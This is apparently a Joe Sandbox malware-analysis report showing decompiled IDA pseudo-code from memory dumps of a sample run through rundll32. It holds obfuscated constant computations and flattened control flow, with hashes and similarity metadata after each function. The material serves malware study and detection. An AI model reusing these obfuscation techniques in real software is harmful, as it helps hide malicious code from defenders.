                                                                                                                      					_t98 =  *0x2d5210; // 0x0
                                                                                                                      					E002CA156(_v28, _t98 + 0x1c, _v24, _v32, _v20);
                                                                                                                      					_t105 = _t105 + 0xc;
                                                                                                                      					_t89 = 0x7d77246;
                                                                                                                      					L5:
                                                                                                                      				} while (_t89 != 0x7d77246);
                                                                                                                      				return 1;
                                                                                                                      			}

















                                                                                                                      0x002b6d4f
                                                                                                                      0x00000000
                                                                                                                      0x002b6d31
                                                                                                                      0x002b6d5c
                                                                                                                      0x002b6d68
                                                                                                                      0x002b6d6d
                                                                                                                      0x002b6d70
                                                                                                                      0x002b6d72
                                                                                                                      0x002b6d72
                                                                                                                      0x002b6d7f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,`>$fL,D$o7N
                                                                                                                      • API String ID: 0-3130479144
                                                                                                                      • Opcode ID: c8de906648f07994677401953716683c1fd555a198a8c108b24852bb199dc41b
                                                                                                                      • Instruction ID: 8875874a5ba5acf4fb5f06e90bac566ff3f4c06b5e0fb388ed7d3247602e6f94
                                                                                                                      • Opcode Fuzzy Hash: c8de906648f07994677401953716683c1fd555a198a8c108b24852bb199dc41b
                                                                                                                      • Instruction Fuzzy Hash: D34136B1E1021AEBDF49CFA4D98A4EEBBB1FF44314F208559D511A7260D3B44B45CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E002B6ED6(intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t87;
                                                                                                                      				void* _t89;
                                                                                                                      				intOrPtr* _t90;
                                                                                                                      				signed int _t93;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      
                                                                                                                      				_v48 = 0x387a4d;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v40 = 0;
                                                                                                                      				_v24 = 0x2424c8;
                                                                                                                      				_v24 = _v24 ^ 0x2613c361;
                                                                                                                      				_t93 = 0x67;
                                                                                                                      				_t104 = _a4;
                                                                                                                      				_v24 = _v24 * 0x39;
                                                                                                                      				_v24 = _v24 ^ 0x8272caac;
                                                                                                                      				_v8 = 0x1db7b6;
                                                                                                                      				_v8 = _v8 * 0x22;
                                                                                                                      				_v8 = _v8 + 0xffff08c1;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0x7e2ce57a;
                                                                                                                      				_v32 = 0xc3f5b3;
                                                                                                                      				_v32 = _v32 * 0x7f;
                                                                                                                      				_v32 = _v32 ^ 0x61389900;
                                                                                                                      				_v12 = 0x2d74a5;
                                                                                                                      				_v12 = _v12 / _t93;
                                                                                                                      				_v12 = _v12 + 0xffffbd08;
                                                                                                                      				_v12 = _v12 * 0x6a;
                                                                                                                      				_v12 = _v12 ^ 0x0019f3c3;
                                                                                                                      				_v28 = 0x7d8734;
                                                                                                                      				_v28 = _v28 >> 7;
                                                                                                                      				_v28 = _v28 << 1;
                                                                                                                      				_v28 = _v28 ^ 0x000207bd;
                                                                                                                      				_v20 = 0x79f3b3;
                                                                                                                      				_v20 = _v20 | 0xe743018d;
                                                                                                                      				_v20 = _v20 + 0xb3b6;
                                                                                                                      				_v20 = _v20 + 0x51ad;
                                                                                                                      				_v20 = _v20 ^ 0xe775faa1;
                                                                                                                      				_v36 = 0x6d6a5a;
                                                                                                                      				_v36 = _v36 << 0xd;
                                                                                                                      				_v36 = _v36 ^ 0xad48a6bc;
                                                                                                                      				_v16 = 0x62a4bc;
                                                                                                                      				_v16 = _v16 >> 7;
                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                      				_v16 = _v16 * 0x38;
                                                                                                                      				_v16 = _v16 ^ 0xac926db4;
                                                                                                                      				_t87 =  *((intOrPtr*)(_t104 + 0xc))( *((intOrPtr*)(_t104 + 0x30)), 1, 0);
                                                                                                                      				_t109 = _t87;
                                                                                                                      				if(_t87 != 0) {
                                                                                                                      					_push(0x2b188c);
                                                                                                                      					_push(_v32);
                                                                                                                      					_t72 =  &_v8; // 0x7e2ce57a
                                                                                                                      					_t89 = E002BBB4B(_v24,  *_t72, _t109);
                                                                                                                      					_push( *((intOrPtr*)(_t104 + 0x30)));
                                                                                                                      					_t106 = _t89;
                                                                                                                      					_push(_v28);
                                                                                                                      					_t90 = E002C9861(_v12, _t89);
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						 *_t90();
                                                                                                                      					}
                                                                                                                      					E002BAE03(_v20, _v36, _v16, _t106);
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Mz8$Zjm$z,~
                                                                                                                      • API String ID: 0-2456983437
                                                                                                                      • Opcode ID: 37eaed5dc66e102ab1204a1781f3607055c69a72dfc86eeec90a83ce3bab770d
                                                                                                                      • Instruction ID: 2e9180acea2c578fba6a26c3eadd9417dcba0b3bcb24ba3b77e00080b6a8ce05
                                                                                                                      • Opcode Fuzzy Hash: 37eaed5dc66e102ab1204a1781f3607055c69a72dfc86eeec90a83ce3bab770d
                                                                                                                      • Instruction Fuzzy Hash: 4E410071D1031AABCF08CFA1C98A8EEBBB1FB44354F20815AD821B6250D7B85B51CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002D3672() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				intOrPtr _t69;
                                                                                                                      				intOrPtr _t71;
                                                                                                                      
                                                                                                                      				_v16 = 0x1920f4;
                                                                                                                      				_v16 = _v16 | 0xcc0e70e0;
                                                                                                                      				_v16 = _v16 + 0xffff67e9;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x00056687;
                                                                                                                      				_v12 = 0xe97d2f;
                                                                                                                      				_v12 = _v12 * 5;
                                                                                                                      				_v12 = _v12 + 0xdb12;
                                                                                                                      				_v12 = _v12 ^ 0x6ef3d177;
                                                                                                                      				_v12 = _v12 ^ 0x6a6f4e7b;
                                                                                                                      				_v8 = 0xee58e5;
                                                                                                                      				_v8 = _v8 + 0xffff20e4;
                                                                                                                      				_v8 = _v8 + 0x2db7;
                                                                                                                      				_v8 = _v8 + 0xffff706b;
                                                                                                                      				_v8 = _v8 ^ 0x00e27cba;
                                                                                                                      				_v24 = 0x674fea;
                                                                                                                      				_v24 = _v24 << 0xd;
                                                                                                                      				_v24 = _v24 << 0xe;
                                                                                                                      				_v24 = _v24 + 0xffff2a40;
                                                                                                                      				_v24 = _v24 ^ 0x4ff265ad;
                                                                                                                      				_v32 = 0x2c6dbe;
                                                                                                                      				_v32 = _v32 >> 2;
                                                                                                                      				_v32 = _v32 ^ 0x000c65e7;
                                                                                                                      				_v20 = 0xd3ac82;
                                                                                                                      				_v20 = _v20 * 0x77;
                                                                                                                      				_v20 = _v20 << 0xc;
                                                                                                                      				_v20 = _v20 + 0x1c1c;
                                                                                                                      				_v20 = _v20 ^ 0x53000be4;
                                                                                                                      				_v28 = 0xd3eaf5;
                                                                                                                      				_v28 = _v28 ^ 0xd0f82d1e;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0x57832eb1;
                                                                                                                      				_t69 =  *0x2d5c9c; // 0x0
                                                                                                                      				E002CE884(_v16, _v12, _v8,  *((intOrPtr*)(_t69 + 0x50)));
                                                                                                                      				_t71 =  *0x2d5c9c; // 0x0
                                                                                                                      				return E002B68DE(_v24, _v32, _v20, _v28,  *((intOrPtr*)(_t71 + 0x58)));
                                                                                                                      			}













                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {Noj$Og$X
                                                                                                                      • API String ID: 0-3024020846
                                                                                                                      • Opcode ID: d5ac16c8f7473eca336e5a2e2737b9489fde11c7efb9e5855e649958d7a0c43f
                                                                                                                      • Instruction ID: 45558618a161b15d11834a600183eb298bdcb382492a3aa0390a605fc7a99e3d
                                                                                                                      • Opcode Fuzzy Hash: d5ac16c8f7473eca336e5a2e2737b9489fde11c7efb9e5855e649958d7a0c43f
                                                                                                                      • Instruction Fuzzy Hash: 8031AFB6C0170AEBCF45DFE4C94A8AEFBB0BB50308F208189D52266261D7B54B59DF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002CBE8C() {
                                                                                                                      				char _v524;
                                                                                                                      				intOrPtr _v548;
                                                                                                                      				char _v564;
                                                                                                                      				void* _v576;
                                                                                                                      				intOrPtr _v580;
                                                                                                                      				intOrPtr _v584;
                                                                                                                      				char _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _t217;
                                                                                                                      				signed int _t223;
                                                                                                                      				void* _t224;
                                                                                                                      				void* _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t248;
                                                                                                                      				void* _t251;
                                                                                                                      				void* _t256;
                                                                                                                      				void* _t258;
                                                                                                                      
                                                                                                                      				_v580 = 0x2596f5;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t227 = 0;
                                                                                                                      				_t229 = 0x1e;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t251 = 0x1d7b34c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v624 = 0x892a55;
                                                                                                                      				_v624 = _v624 | 0xee7fd748;
                                                                                                                      				_v624 = _v624 ^ 0xeeffffdd;
                                                                                                                      				_v620 = 0x622f6;
                                                                                                                      				_v620 = _v620 + 0xbb0c;
                                                                                                                      				_v620 = _v620 + 0xffff07a8;
                                                                                                                      				_v620 = _v620 ^ 0x0005e5ab;
                                                                                                                      				_v632 = 0xb1aa42;
                                                                                                                      				_v632 = _v632 + 0xffffd879;
                                                                                                                      				_v632 = _v632 << 7;
                                                                                                                      				_v632 = _v632 ^ 0x58c15d83;
                                                                                                                      				_v668 = 0xaf491c;
                                                                                                                      				_v668 = _v668 | 0xa282f1df;
                                                                                                                      				_v668 = _v668 * 0x52;
                                                                                                                      				_v668 = _v668 ^ 0xbc704b9b;
                                                                                                                      				_v668 = _v668 ^ 0xa02fbf7e;
                                                                                                                      				_v604 = 0x754ed8;
                                                                                                                      				_v604 = _v604 / _t229;
                                                                                                                      				_v604 = _v604 ^ 0x00089259;
                                                                                                                      				_v636 = 0x96d5f2;
                                                                                                                      				_v636 = _v636 + 0xd4a1;
                                                                                                                      				_t230 = 0x30;
                                                                                                                      				_v636 = _v636 * 0x11;
                                                                                                                      				_v636 = _v636 ^ 0x0a12807c;
                                                                                                                      				_v660 = 0x62eec7;
                                                                                                                      				_v660 = _v660 >> 3;
                                                                                                                      				_v660 = _v660 / _t230;
                                                                                                                      				_v660 = _v660 ^ 0xcf464c50;
                                                                                                                      				_v660 = _v660 ^ 0xcf48190c;
                                                                                                                      				_v596 = 0xd58755;
                                                                                                                      				_v596 = _v596 + 0xffffee65;
                                                                                                                      				_v596 = _v596 ^ 0x00d4794f;
                                                                                                                      				_v652 = 0xd65add;
                                                                                                                      				_v652 = _v652 + 0x69d5;
                                                                                                                      				_v652 = _v652 + 0xffff6cdd;
                                                                                                                      				_t231 = 0x44;
                                                                                                                      				_v652 = _v652 * 0x6f;
                                                                                                                      				_v652 = _v652 ^ 0x5cddf580;
                                                                                                                      				_v592 = 0x774283;
                                                                                                                      				_v592 = _v592 / _t231;
                                                                                                                      				_v592 = _v592 ^ 0x00057017;
                                                                                                                      				_v608 = 0x66f034;
                                                                                                                      				_v608 = _v608 * 0x1b;
                                                                                                                      				_v608 = _v608 ^ 0x0ad54449;
                                                                                                                      				_v628 = 0x797189;
                                                                                                                      				_v628 = _v628 | 0xd7c49ce2;
                                                                                                                      				_v628 = _v628 + 0x4eb;
                                                                                                                      				_v628 = _v628 ^ 0xd7fc7544;
                                                                                                                      				_v644 = 0xc6323c;
                                                                                                                      				_t232 = 0x1a;
                                                                                                                      				_v644 = _v644 / _t232;
                                                                                                                      				_v644 = _v644 | 0xc7b29cf4;
                                                                                                                      				_v644 = _v644 ^ 0xc7b916af;
                                                                                                                      				_v640 = 0x832b72;
                                                                                                                      				_v640 = _v640 << 1;
                                                                                                                      				_v640 = _v640 ^ 0x03109e90;
                                                                                                                      				_v640 = _v640 ^ 0x021bea31;
                                                                                                                      				_v600 = 0x7e41eb;
                                                                                                                      				_v600 = _v600 ^ 0xc4682a67;
                                                                                                                      				_v600 = _v600 ^ 0xc419d008;
                                                                                                                      				_v648 = 0x2ae2e2;
                                                                                                                      				_v648 = _v648 ^ 0xaa2d9f28;
                                                                                                                      				_v648 = _v648 ^ 0xe0508244;
                                                                                                                      				_v648 = _v648 + 0xffff0ac8;
                                                                                                                      				_v648 = _v648 ^ 0x4a517815;
                                                                                                                      				_v656 = 0x46e590;
                                                                                                                      				_v656 = _v656 + 0xffffd71a;
                                                                                                                      				_v656 = _v656 << 0xb;
                                                                                                                      				_v656 = _v656 | 0x65ccd40d;
                                                                                                                      				_v656 = _v656 ^ 0x75e69a05;
                                                                                                                      				_v616 = 0x212081;
                                                                                                                      				_v616 = _v616 + 0xffff369d;
                                                                                                                      				_v616 = _v616 << 3;
                                                                                                                      				_v616 = _v616 ^ 0x010dc67b;
                                                                                                                      				_v612 = 0xde1992;
                                                                                                                      				_v612 = _v612 | 0x34451690;
                                                                                                                      				_v612 = _v612 ^ 0x34df36a3;
                                                                                                                      				_v664 = 0xb873dc;
                                                                                                                      				_t233 = 9;
                                                                                                                      				_t250 = _v612;
                                                                                                                      				_v664 = _v664 / _t233;
                                                                                                                      				_v664 = _v664 * 0x16;
                                                                                                                      				_v664 = _v664 << 6;
                                                                                                                      				_v664 = _v664 ^ 0x70bc85f2;
                                                                                                                      				_v672 = 0x9e756b;
                                                                                                                      				_v672 = _v672 + 0xfffff8a5;
                                                                                                                      				_v672 = _v672 << 4;
                                                                                                                      				_v672 = _v672 * 0x17;
                                                                                                                      				_v672 = _v672 ^ 0xe3b54af9;
                                                                                                                      				do {
                                                                                                                      					while(_t251 != 0x1d7b34c) {
                                                                                                                      						if(_t251 == 0x2564c7d) {
                                                                                                                      							_t217 = E002CBC49(_t250, _v628, _v644, _v640,  &_v564, _v600);
                                                                                                                      							_t234 = _v648;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t251 = ( ~_t217 & 0xf96b950b) + 0xe5304db;
                                                                                                                      							E002C4DAD(_v648, _v656, _t250, _v616, _v612);
                                                                                                                      							_t258 = _t258 + 0x24;
                                                                                                                      							goto L14;
                                                                                                                      						} else {
                                                                                                                      							if(_t251 == 0x7be99e6) {
                                                                                                                      								_t248 = _v672;
                                                                                                                      								E002CBBB2(_v664, _t248,  &_v588);
                                                                                                                      								_pop(_t234);
                                                                                                                      								_t251 = 0xba7f047;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t251 == 0xb29cf6f) {
                                                                                                                      									_t234 = 0;
                                                                                                                      									_t248 = _v624;
                                                                                                                      									_t223 = E002CE938(0, _t248, _v660, _v596, _v632, 0, _v652, _v592, 0, _v608, _v620,  &_v524);
                                                                                                                      									_t250 = _t223;
                                                                                                                      									_t258 = _t258 + 0x28;
                                                                                                                      									__eflags = _t223 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t251 = 0x2564c7d;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t251 == 0xba7f047) {
                                                                                                                      										_t224 = E002B9A1E();
                                                                                                                      										_t256 = _v588 - _v548;
                                                                                                                      										asm("sbb ecx, [esp+0x94]");
                                                                                                                      										__eflags = _v584 - _t248;
                                                                                                                      										if(__eflags >= 0) {
                                                                                                                      											if(__eflags > 0) {
                                                                                                                      												L19:
                                                                                                                      												_t227 = 1;
                                                                                                                      												__eflags = 1;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t256 - _t224;
                                                                                                                      												if(_t256 >= _t224) {
                                                                                                                      													goto L19;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										_t265 = _t251 - 0xcb5264b;
                                                                                                                      										if(_t251 != 0xcb5264b) {
                                                                                                                      											goto L14;
                                                                                                                      										} else {
                                                                                                                      											_t248 = _v668;
                                                                                                                      											_t226 = E002D12A8(_t234, _t248, _t265, _v604, _v636,  &_v524);
                                                                                                                      											_t258 = _t258 + 0xc;
                                                                                                                      											if(_t226 != 0) {
                                                                                                                      												_t251 = 0xb29cf6f;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t227;
                                                                                                                      					}
                                                                                                                      					_t251 = 0xcb5264b;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t251 - 0xe5304db;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L20;
                                                                                                                      			}













































                                                                                                                      0x002cc2cd
                                                                                                                      0x002cc286
                                                                                                                      0x002cc28b
                                                                                                                      0x002cc28b
                                                                                                                      0x002cc28b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A~$*
                                                                                                                      • API String ID: 0-472959745
                                                                                                                      • Opcode ID: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction ID: 8b5b60b31a5d7fd32f099a645f24600ad46c331e33fbe04b430454017ba08596
                                                                                                                      • Opcode Fuzzy Hash: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction Fuzzy Hash: C4B172728183819FD758DF65C58991BFBE1BBC4708F104A1DF9EA96220D3B18919CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002C41A7() {
                                                                                                                      				signed int _v4;
                                                                                                                      				char _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t218;
                                                                                                                      				signed int _t219;
                                                                                                                      				signed int _t227;
                                                                                                                      				intOrPtr _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				void* _t233;
                                                                                                                      				void* _t251;
                                                                                                                      				signed int* _t255;
                                                                                                                      
                                                                                                                      				_t255 =  &_v100;
                                                                                                                      				_v68 = 0xec424;
                                                                                                                      				_v68 = _v68 | 0x15a76721;
                                                                                                                      				_v68 = _v68 + 0xba51;
                                                                                                                      				_v68 = _v68 ^ 0x95b0a177;
                                                                                                                      				_v32 = 0x9cb342;
                                                                                                                      				_v32 = _v32 >> 0xf;
                                                                                                                      				_v32 = _v32 ^ 0x0000013b;
                                                                                                                      				_v72 = 0xae6f3e;
                                                                                                                      				_v72 = _v72 >> 0xb;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v72 = _v72 * 0x1b;
                                                                                                                      				_t251 = 0x38ba83c;
                                                                                                                      				_v72 = _v72 ^ 0x000cf0a1;
                                                                                                                      				_v40 = 0xd29c0d;
                                                                                                                      				_v40 = _v40 | 0x0be9fd1c;
                                                                                                                      				_v40 = _v40 ^ 0x0bf96d7b;
                                                                                                                      				_v96 = 0x10a61a;
                                                                                                                      				_v96 = _v96 + 0x673b;
                                                                                                                      				_v96 = _v96 + 0x336d;
                                                                                                                      				_v96 = _v96 + 0x2fcb;
                                                                                                                      				_v96 = _v96 ^ 0x001323ac;
                                                                                                                      				_v100 = 0x9d3afd;
                                                                                                                      				_v100 = _v100 << 7;
                                                                                                                      				_v100 = _v100 << 5;
                                                                                                                      				_t230 = 0x55;
                                                                                                                      				_v100 = _v100 / _t230;
                                                                                                                      				_v100 = _v100 ^ 0x027b67ec;
                                                                                                                      				_v84 = 0x9cb324;
                                                                                                                      				_v84 = _v84 + 0xffffbca6;
                                                                                                                      				_v84 = _v84 + 0xd0f1;
                                                                                                                      				_v84 = _v84 << 0xa;
                                                                                                                      				_v84 = _v84 ^ 0x750d3d14;
                                                                                                                      				_v88 = 0x3cd70;
                                                                                                                      				_v88 = _v88 << 0xc;
                                                                                                                      				_v88 = _v88 + 0x865d;
                                                                                                                      				_t231 = 0x65;
                                                                                                                      				_v88 = _v88 / _t231;
                                                                                                                      				_v88 = _v88 ^ 0x009e1e24;
                                                                                                                      				_v24 = 0xf6c479;
                                                                                                                      				_v24 = _v24 ^ 0xf85d6d57;
                                                                                                                      				_v24 = _v24 ^ 0xf8a5b53e;
                                                                                                                      				_v92 = 0xa4533c;
                                                                                                                      				_v92 = _v92 << 8;
                                                                                                                      				_v92 = _v92 << 0xf;
                                                                                                                      				_v92 = _v92 ^ 0x907f3c14;
                                                                                                                      				_v92 = _v92 ^ 0x0e792839;
                                                                                                                      				_v28 = 0xd04f15;
                                                                                                                      				_v28 = _v28 * 0x53;
                                                                                                                      				_v28 = _v28 ^ 0x4380c19a;
                                                                                                                      				_v36 = 0x6fba0d;
                                                                                                                      				_v36 = _v36 * 0x6b;
                                                                                                                      				_v36 = _v36 ^ 0x2ebab037;
                                                                                                                      				_v20 = 0x23d496;
                                                                                                                      				_v20 = _v20 ^ 0x4cebd1bd;
                                                                                                                      				_v20 = _v20 ^ 0x4cc2ad40;
                                                                                                                      				_v60 = 0x3b5a6d;
                                                                                                                      				_v60 = _v60 >> 0x10;
                                                                                                                      				_v60 = _v60 << 7;
                                                                                                                      				_v60 = _v60 ^ 0x0000f98a;
                                                                                                                      				_v64 = 0xf0d036;
                                                                                                                      				_v64 = _v64 + 0xffff53b4;
                                                                                                                      				_v64 = _v64 ^ 0x894664b9;
                                                                                                                      				_v64 = _v64 ^ 0x89bf3867;
                                                                                                                      				_v48 = 0xb08deb;
                                                                                                                      				_v48 = _v48 | 0x78ca9a10;
                                                                                                                      				_v48 = _v48 + 0xffff33de;
                                                                                                                      				_v48 = _v48 ^ 0x78fbc05b;
                                                                                                                      				_v16 = 0x2da7c5;
                                                                                                                      				_v16 = _v16 >> 6;
                                                                                                                      				_v16 = _v16 ^ 0x00092ddb;
                                                                                                                      				_v52 = 0x523898;
                                                                                                                      				_t232 = 0x59;
                                                                                                                      				_t227 = _v4;
                                                                                                                      				_v52 = _v52 / _t232;
                                                                                                                      				_v52 = _v52 << 9;
                                                                                                                      				_v52 = _v52 ^ 0x01d201e4;
                                                                                                                      				_v56 = 0x19cc06;
                                                                                                                      				_v56 = _v56 + 0xfffff128;
                                                                                                                      				_v56 = _v56 << 0xe;
                                                                                                                      				_v56 = _v56 ^ 0x6f4387c2;
                                                                                                                      				_v76 = 0x5278ca;
                                                                                                                      				_v76 = _v76 << 9;
                                                                                                                      				_v76 = _v76 ^ 0x8826d706;
                                                                                                                      				_t233 = 0x5c;
                                                                                                                      				_v76 = _v76 * 0x5a;
                                                                                                                      				_v76 = _v76 ^ 0xc3a97567;
                                                                                                                      				_v12 = 0xdfbc19;
                                                                                                                      				_v12 = _v12 + 0xffff7584;
                                                                                                                      				_v12 = _v12 ^ 0x00deabf9;
                                                                                                                      				_v44 = 0x7b85bc;
                                                                                                                      				_v44 = _v44 * 9;
